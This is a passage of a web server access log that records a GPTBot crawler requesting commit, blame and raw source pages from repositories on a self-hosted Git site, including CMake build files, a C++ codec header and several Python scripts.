"/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11020] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15082] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10167] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10928] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10925] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13700] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21605] [Gzip 28.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:15:36:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21652] [Gzip 28.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:15:36:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15340] [Gzip 8.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:15:36:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10195] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13702] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13698] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 355] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:15:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7637] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" +[17/Feb/2026:15:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8486] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:15:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" +[17/Feb/2026:15:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=source" [Client 74.7.227.38] [Length 12966] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" +[17/Feb/2026:15:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16090] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" +[17/Feb/2026:15:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" +[17/Feb/2026:15:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=source" [Client 74.7.227.38] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" +[17/Feb/2026:15:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" +[17/Feb/2026:15:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf?display=source" [Client 74.7.227.38] [Length 11955] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" +[17/Feb/2026:15:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" +[17/Feb/2026:15:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" +[17/Feb/2026:15:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" +[17/Feb/2026:15:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 24886] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:15:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21544] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" +[17/Feb/2026:15:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2flocalpycs%2fpyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 18044] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10839] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/App.tsx" +[17/Feb/2026:15:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14184] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:15:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 